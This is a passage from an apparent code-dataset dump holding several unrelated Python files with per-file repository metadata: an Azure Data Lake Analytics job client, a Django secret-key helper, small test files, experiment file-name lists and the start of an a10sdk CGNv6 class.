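#     poller = client.job.update(acct, job_id, parameters=upd)  # ARMPolling (default)
#     job = poller.result()  # block until the service reports completion
#     client.job.update(acct, job_id, parameters=upd, polling=False)  # no polling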
def get_statistics(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
"""Gets statistics of the specified job.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job Information ID.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobStatistics or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobStatistics or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_statistics.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobStatistics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_statistics.metadata = {'url': '/jobs/{jobIdentity}/GetStatistics'}
def get_debug_data_path(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
"""Gets the job debug data information specified by the job ID.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobDataPath or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobDataPath or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_debug_data_path.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobDataPath', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_debug_data_path.metadata = {'url': '/jobs/{jobIdentity}/GetDebugDataPath'}
def _cancel_initial(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.cancel.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def cancel(
self, account_name, job_identity, custom_headers=None, raw=False, polling=True, **operation_config):
"""Cancels the running job specified by the job ID.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._cancel_initial(
account_name=account_name,
job_identity=job_identity,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
cancel.metadata = {'url': '/jobs/{jobIdentity}/CancelJob'}
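# Hedged usage sketch: `cancel` also returns an LROPoller, but its result
# is None, so callers typically just block on wait(). Names are placeholders.
#
#     client.job.cancel('myadlaaccount', job_id).wait()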
def _yield_method_initial(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.yield_method.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def yield_method(
self, account_name, job_identity, custom_headers=None, raw=False, polling=True, **operation_config):
"""Pauses the specified job and places it back in the job queue, behind
other jobs of equal or higher importance, based on priority. (Only for
use internally with Scope job type.).
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._yield_method_initial(
account_name=account_name,
job_identity=job_identity,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
yield_method.metadata = {'url': '/jobs/{jobIdentity}/YieldJob'}
def build(
self, account_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Builds (compiles) the specified job in the specified Data Lake
Analytics account for job correctness and validation.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param parameters: The parameters to build a job.
:type parameters:
~azure.mgmt.datalake.analytics.job.models.BuildJobParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobInformation or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobInformation or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.build.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'BuildJobParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
build.metadata = {'url': '/buildJob'}
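# Hedged usage sketch (illustrative): compile-checking a script without
# submitting it, using `build` above. Unlike `create`, no job identity
# appears in the URL ('/buildJob'). Model names follow
# azure.mgmt.datalake.analytics.job.models; the script is a placeholder.
#
#     from azure.mgmt.datalake.analytics.job.models import (
#         BuildJobParameters, CreateUSqlJobProperties, JobType)
#     result = client.job.build('myadlaaccount', BuildJobParameters(
#         name='syntax-check', type=JobType.usql,
#         properties=CreateUSqlJobProperties(script='@a = SELECT 1 AS x;')))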
| 46.561662
| 157
| 0.663164
| 3,885
| 34,735
| 5.736422
| 0.07722
| 0.026025
| 0.019384
| 0.029077
| 0.856502
| 0.847124
| 0.830028
| 0.813515
| 0.795881
| 0.792426
| 0
| 0.003804
| 0.243184
| 34,735
| 745
| 158
| 46.624161
| 0.843959
| 0.296531
| 0
| 0.757033
| 0
| 0
| 0.124798
| 0.040886
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.015345
| 0
| 0.12532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0204e80840bd71bab0eb10f6170715ca6c1c6c5b
| 170
|
py
|
Python
|
api/secret_key.py
|
dima7a14/FamilyBudget-api
|
871947b40c47a62198b9a5d6c524ee6d4fc93088
|
[
"MIT"
] | null | null | null |
api/secret_key.py
|
dima7a14/FamilyBudget-api
|
871947b40c47a62198b9a5d6c524ee6d4fc93088
|
[
"MIT"
] | 1
|
2021-04-08T19:28:42.000Z
|
2021-04-08T19:28:42.000Z
|
api/secret_key.py
|
dima7a14/FamilyBudget-api
|
871947b40c47a62198b9a5d6c524ee6d4fc93088
|
[
"MIT"
] | null | null | null |
from django.core.management.utils import get_random_secret_key
def generate_secret_key():
"""Generates secret key for django."""
return get_random_secret_key()
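# Hedged usage sketch (not part of the original module): writing a fresh
# key into a local env file for Django settings; the '.env' target is an
# assumption for illustration.
#
#     from api.secret_key import generate_secret_key
#     with open('.env', 'a') as f:
#         f.write('SECRET_KEY=' + generate_secret_key() + '\n')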
| 24.285714
| 62
| 0.776471
| 24
| 170
| 5.166667
| 0.625
| 0.290323
| 0.241935
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135294
| 170
| 6
| 63
| 28.333333
| 0.843537
| 0.188235
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
0289d1ec39be67c7780e2ec30f1215fbf70cc875
| 71
|
py
|
Python
|
tests/test_decorer_ruuvi_v3.py
|
jollierfinbean/bleak_ruuvitag
|
617ace8a3c06eb013b890a7f7c5de0beb90925a5
|
[
"MIT"
] | null | null | null |
tests/test_decorer_ruuvi_v3.py
|
jollierfinbean/bleak_ruuvitag
|
617ace8a3c06eb013b890a7f7c5de0beb90925a5
|
[
"MIT"
] | null | null | null |
tests/test_decorer_ruuvi_v3.py
|
jollierfinbean/bleak_ruuvitag
|
617ace8a3c06eb013b890a7f7c5de0beb90925a5
|
[
"MIT"
] | null | null | null |
from .context import bleak_ruuvitag
def test_create():
pass # TODO
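# Hedged sketch of what the TODO above might grow into. `decode_v3` is a
# hypothetical decoder name (the real bleak_ruuvitag API is not shown
# here); the hex payload is the RuuviTag data-format-3 example vector.
#
#     def test_create():
#         payload = bytes.fromhex('03291A1ECE1EFC18F94202CA0B53')
#         data = bleak_ruuvitag.decode_v3(payload)
#         assert data is not None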
| 17.75
| 35
| 0.746479
| 10
| 71
| 5.1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183099
| 71
| 4
| 36
| 17.75
| 0.87931
| 0.056338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
5a2a7f477511eabb8cfc95db9fc80985b57bd116
| 4,448
|
py
|
Python
|
SensitivityStudy/LoadSensitivityStudyFileNames.py
|
Lucciola111/stream_autoencoder_windowing
|
5456b07bd20220c987598db2cdb832d8195e1575
|
[
"MIT"
] | 4
|
2021-09-16T05:50:25.000Z
|
2021-12-31T07:04:55.000Z
|
SensitivityStudy/LoadSensitivityStudyFileNames.py
|
Lucciola111/stream_autoencoder_windowing
|
5456b07bd20220c987598db2cdb832d8195e1575
|
[
"MIT"
] | null | null | null |
SensitivityStudy/LoadSensitivityStudyFileNames.py
|
Lucciola111/stream_autoencoder_windowing
|
5456b07bd20220c987598db2cdb832d8195e1575
|
[
"MIT"
] | 1
|
2021-12-16T06:53:08.000Z
|
2021-12-16T06:53:08.000Z
|
def load_sensitivity_study_file_names(design):
"""
Parameters
----------
design: Name of design
Returns experiment files names of a design
-------
"""
path = None  # initialized so an unknown design cannot raise UnboundLocalError below
file_names = {}
if design == 'NAE-IAW':
path = '../Files_Results/Sensitivity_Study/NAE-IAW/'
file_names['FILE_MeanDrift_var0.01'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.01_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-10_10.32.pickle_2021-08-24_12.30_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanDrift_var0.05'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.05_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.42.pickle_2021-08-24_14.36_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanDrift_var0.25'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.25_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.45.pickle_2021-08-24_17.24_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_VarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyVarianceDrift_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_11.15.pickle_2021-08-24_20.58_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanVarianceDrift_all_broken'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_100MinDimBroken_300MinL_2000MaxL_2021-08-06_10.54.pickle_2021-08-24_13.34_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanVarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.53.pickle_2021-08-24_16.22_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_RandomRBF_Generator'] = 'Sensitivity_Study_RandomRandomRBF_50DR_100Dims_50Centroids_1MinDriftCentroids_300MinL_2000MaxL_2021-08-06_10.57.pickle_2021-08-24_13.20_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MergedStream'] = 'Sensitivity_Study_Mixed_300MinDistance_DATASET_A_RandomNumpyRandomNormalUniform_DATASET_B_RandomRandomRBF.pickle_2021-08-24_13.08_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_FashionMNIST'] = 'Sensitivity_Study_RandomMNIST_and_FashionMNIST_SortAllNumbers19DR_2021-08-06_11.07.pickle_2021-08-25_12.07_10ITERATIONS_fitNewAETrue_fitFalse'
if design == 'RAE-IAW':
path = '../Files_Results/Sensitivity_Study/RAE-IAW/'
file_names['FILE_MeanDrift_var0.01'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.01_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-10_10.32.pickle_2021-08-11_19.36_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanDrift_var0.05'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.05_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.42.pickle_2021-08-12_00.04_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanDrift_var0.25'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.25_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.45.pickle_2021-08-12_14.18_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_VarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyVarianceDrift_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_11.15.pickle_2021-08-12_18.04_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanVarianceDrift_all_broken'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_100MinDimBroken_300MinL_2000MaxL_2021-08-06_10.54.pickle_2021-08-12_20.47_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanVarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.53.pickle_2021-08-13_00.30_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_RandomRBF_Generator'] = 'Sensitivity_Study_RandomRandomRBF_50DR_100Dims_50Centroids_1MinDriftCentroids_300MinL_2000MaxL_2021-08-06_10.57.pickle_2021-08-12_19.37_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MergedStream'] = 'Sensitivity_Study_Mixed_300MinDistance_DATASET_A_RandomNumpyRandomNormalUniform_DATASET_B_RandomRandomRBF.pickle_2021-08-13_03.54_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_FashionMNIST'] = 'Sensitivity_Study_RandomMNIST_and_FashionMNIST_SortAllNumbers19DR_2021-08-06_11.07.pickle_2021-08-12_22.40_10ITERATIONS_fitNewAEFalse_fitTrue'
if path is None: raise ValueError('Unknown design: {}'.format(design))
return path, file_names
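# Hedged usage sketch (illustrative): resolving one experiment file for a
# design; the pickle-loading step that would follow is an assumption.
#
#     path, file_names = load_sensitivity_study_file_names('NAE-IAW')
#     full_path = path + file_names['FILE_VarianceDrift']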
| 111.2
| 239
| 0.859712
| 545
| 4,448
| 6.425688
| 0.168807
| 0.058252
| 0.066819
| 0.083952
| 0.910337
| 0.90691
| 0.813821
| 0.776128
| 0.739577
| 0.739577
| 0
| 0.164053
| 0.068121
| 4,448
| 39
| 240
| 114.051282
| 0.68082
| 0.021583
| 0
| 0
| 0
| 0
| 0.84113
| 0.813803
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5a3c38e4ef396a2e6f8a0d851b558b41e7143157
| 4,575
|
py
|
Python
|
tests/test_uk.py
|
Semtexcz/invenio-oarepo-oai-pmh-harvester
|
2866c7d7355f6885b4f443ee1e82baa24502b36e
|
[
"MIT"
] | null | null | null |
tests/test_uk.py
|
Semtexcz/invenio-oarepo-oai-pmh-harvester
|
2866c7d7355f6885b4f443ee1e82baa24502b36e
|
[
"MIT"
] | null | null | null |
tests/test_uk.py
|
Semtexcz/invenio-oarepo-oai-pmh-harvester
|
2866c7d7355f6885b4f443ee1e82baa24502b36e
|
[
"MIT"
] | null | null | null |
from invenio_nusl_theses.proxies import nusl_theses
from invenio_oarepo_oai_pmh_harvester.models import OAIProvider
from invenio_db import db
from invenio_oarepo_oai_pmh_harvester.synchronization import OAISynchronizer
def test_uk_one_record(app, uk_db, schemas):
uk_provider = OAIProvider.query.filter_by(code="uk").one_or_none()
constant_fields = {
"provider": {"$ref": "http://127.0.0.1:5000/api/taxonomies/institutions/00216208/"},
"accessRights": {"$ref": "http://127.0.0.1:5000/api/taxonomies/accessRights/c_abf2/"},
"accessibility": [{"lang": "cze", "value": "Dostupné v digitálním repozitáři UK."}, {
"lang": "eng", "value": "Available in the Charles University Digital Repository."
}]
}
if not uk_provider:
uk_provider = OAIProvider(
code="uk",
description="Univerzita Karlova",
oai_endpoint="https://dspace.cuni.cz/oai/nusl",
set_="nusl_set",
metadata_prefix="xoai",
constant_fields=constant_fields
)
db.session.add(uk_provider)
db.session.commit()
unhandled_paths = {
"/dc/date/accessioned",
"/dc/date/available",
"/dc/date/issued",
"/dc/identifier/repId",
"/dc/identifier/aleph",
"/dc/description/provenance",
"/dc/description/department",
"/dc/description/faculty",
"/dc/language/cs_CZ",
"/dc/publisher",
"/dcterms/created",
"/thesis/degree/name",
"/thesis/degree/program",
"/thesis/degree/level",
"/uk/abstract",
"/uk/thesis",
"/uk/taxonomy",
"/uk/faculty-name",
"/uk/faculty-abbr",
"/uk/degree-discipline",
"/uk/degree-program",
"/uk/publication-place",
"uk/file-availability",
"/bundles",
"/others/handle",
"/others/lastModifyDate",
"/repository"
}
sync = OAISynchronizer(
uk_provider,
parser_name="xoai",
unhandled_paths=unhandled_paths,
create_record=nusl_theses.create_draft_record,
update_record=nusl_theses.update_draft_record,
delete_record=nusl_theses.delete_draft_record,
pid_type="dnusl",
validation=nusl_theses.validate,
oai_identifiers=["oai:dspace.cuni.cz:20.500.11956/111006"]
)
sync.run()
def test_transformer_uk_sample(app, uk_db, schemas):
uk_provider = OAIProvider.query.filter_by(code="uk").one_or_none()
constant_fields = {
"provider": {"$ref": "http://127.0.0.1:5000/api/taxonomies/institutions/00216208/"},
"accessRights": {"$ref": "http://127.0.0.1:5000/api/taxonomies/accessRights/c_abf2/"},
"accessibility": [{"lang": "cze", "value": "Dostupné v digitálním repozitáři UK."}, {
"lang": "eng", "value": "Available in the Charles University Digital Repository."
}]
}
if not uk_provider:
uk_provider = OAIProvider(
code="uk",
description="Univerzita Karlova",
oai_endpoint="https://dspace.cuni.cz/oai/nusl",
set_="nusl_set",
metadata_prefix="xoai",
constant_fields=constant_fields
)
db.session.add(uk_provider)
db.session.commit()
unhandled_paths = {
"/dc/date/accessioned",
"/dc/date/available",
"/dc/date/issued",
"/dc/identifier/repId",
"/dc/identifier/aleph",
"/dc/description/provenance",
"/dc/description/department",
"/dc/description/faculty",
"/dc/language/cs_CZ",
"/dc/publisher",
"/dcterms/created",
"/thesis/degree/name",
"/thesis/degree/program",
"/thesis/degree/level",
"/uk/abstract",
"/uk/thesis",
"/uk/taxonomy",
"/uk/faculty-name",
"/uk/faculty-abbr",
"/uk/degree-discipline",
"/uk/degree-program",
"/uk/publication-place",
"uk/file-availability",
"/bundles",
"/others/handle",
"/others/lastModifyDate",
"/repository"
}
sync = OAISynchronizer(
uk_provider,
parser_name="xoai",
unhandled_paths=unhandled_paths,
create_record=nusl_theses.create_draft_record,
update_record=nusl_theses.update_draft_record,
delete_record=nusl_theses.delete_draft_record,
pid_type="dnusl",
validation=nusl_theses.validate,
oai_identifiers=["oai:dspace.cuni.cz:20.500.11956/4434"]
)
sync.run()
| 34.398496
| 94
| 0.598907
| 487
| 4,575
| 5.437372
| 0.268994
| 0.037764
| 0.036254
| 0.016616
| 0.927492
| 0.927492
| 0.903323
| 0.903323
| 0.903323
| 0.903323
| 0
| 0.025799
| 0.254426
| 4,575
| 132
| 95
| 34.659091
| 0.750513
| 0
| 0
| 0.873016
| 0
| 0
| 0.375956
| 0.086557
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0
| 0.031746
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a7a9128d3a85846426e2da96f80ff5c7ce97b4d
| 11,908
|
py
|
Python
|
a10sdk/core/cgnv6/cgnv6_fixed_nat_inside.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 16
|
2015-05-20T07:26:30.000Z
|
2021-01-23T11:56:57.000Z
|
a10sdk/core/cgnv6/cgnv6_fixed_nat_inside.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 6
|
2015-03-24T22:07:11.000Z
|
2017-03-28T21:31:18.000Z
|
a10sdk/core/cgnv6/cgnv6_fixed_nat_inside.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 23
|
2015-03-29T15:43:01.000Z
|
2021-06-02T17:12:01.000Z
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Inside(A10BaseClass):
"""Class Description::
Fixed NAT Inside Users.
Class inside supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
